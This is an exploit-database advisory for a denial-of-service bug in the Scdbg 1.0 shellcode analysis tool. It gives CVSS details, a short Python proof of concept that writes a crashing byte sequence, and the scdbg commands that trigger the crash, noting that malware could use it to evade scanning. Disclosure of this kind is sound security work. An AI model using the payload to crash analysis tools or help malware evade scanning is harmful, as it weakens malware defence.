Scdbg 1.0 Buffer overflow DoS

2023.03.27
Risk: Medium
Local: Yes
Remote: No
CVE: N/A

# Exploit Title: Scdbg 1.0 - Buffer overflow DoS # Discovery by: Rafael Pedrero # Discovery Date: 2021-06-13 # Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152 # Software Link : https://github.com/dzzie/VS_LIBEMU # Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45 # Tested on: Windows 7, 10 CVSS v3: 7.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CWE: CWE-400 Vulnerability description: scdbg.exe (all versions) is affected by a Denial of Service vulnerability that occurs when you use the /foff parameter or not with a specific shellcode causing it to shutdown. Any malware could use this option to evade the scan. Proof of concept: Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin #!/usr/bin/env python crash = "\x90\xF6\x84\x01\x90\x90\x90\x90" f = open ("scdbg_crash.bin", "w") f.write(crash) f.close() You can use gui_launcher.exe and check "Start offset 0x": 1 or directly without check [image: image.png]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top